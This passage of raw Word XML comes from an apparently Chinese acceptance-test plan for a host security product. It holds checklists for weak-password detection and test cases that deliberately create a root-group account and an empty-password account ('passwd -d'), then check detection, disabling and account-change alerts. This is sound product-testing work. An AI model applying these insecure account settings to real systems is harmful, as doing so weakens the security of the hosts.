                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持检测mysql弱口令     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持检测ftp弱口令        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持检测rdp弱口令        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>支持检测elasticsearch弱口令  口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t>支持检测postgresql弱口令  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99" w:name="_Toc24417"/>
      <w:bookmarkStart w:id="100" w:name="_Toc607919858"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>账号风险检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>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可识别高权限账号、空密码账号，支持高危账号忽略、禁用、信任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t>测试产品是否具有</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>账号风险</w:t>
            </w:r>
            <w:r>
              <w:t>检查功能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t>主机操作系统到服务端网络访问关系通畅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1"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45"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录测试主机Oracle-76-02，新建一个账号test1：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>useradd test1;passwd test1（根据提示设置密码）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构建高权限帐号：usermod -g root test1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>useradd test2；passwd test2（根据提示设置密码）</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构建空密码帐号：passwd -d test2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>登录服务端对Oracle-76-02主机进行相应检测</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在服务端对Oracle-76-02检测到的高危账号test1进行禁用</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="50"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="45"/>
              </w:numPr>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Oracle-76-01上执行ssh test1@{Oracle-76-02的ip}登录Oracle-76-02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结果</w:t>
            </w:r>
            <w:r>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（步骤1-2）</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可识别Oracle-76-02上存在高权限账号test1、空密码账号test2；</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:t>结果2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（步骤3-4）</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test1被禁用后无法登录Oracle-76-02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支持高危帐号、空密码帐号检测 口 通过   口 未通过  口 未测试 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">支持高危帐号禁用              </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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101" w:name="_Toc9954"/>
      <w:bookmarkStart w:id="102" w:name="_Toc1729344627"/>
      <w:bookmarkStart w:id="103" w:name="_Toc6701"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号完整性监控</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="90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7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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>账号完整性监控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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>支持监控账号完整性，可发现用户名修改、新增或者删除行为。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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman"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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>开启账号完整性监控</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="46"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在客户端主机下操作新增、修改密码、修改权限、修改用户名、删除账号一系列操作</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">    Linux主机账号管理：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>新建用户test_user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#useradd test_user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修改test_user用户密码为123</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#passwd test_user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>密码输入123</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修改test_user权限为root组</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#usermod -g root test_user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>修改账号test_user用户名为ccb_user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#usermod -l ccb_user -d /home/ccb_user -m test_user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>删除账号ccb_user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="420" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cs="Times New Roman" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>#userdel -r ccb_user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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>服务端可以看到5条告警为：</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>新增用户test_user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>test_user密码被修改</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>test_user权限变更为root组</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>test_user用户名被修改为ccb_user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>账号ccb_user被删除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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634"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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634"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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7634" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">支持检测新增帐号行为                 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">             </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">支持检测修改帐号名称、密码和权限行为 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>口 通过   口 未通过  口 未测试</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">支持检测删除帐号行为                 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
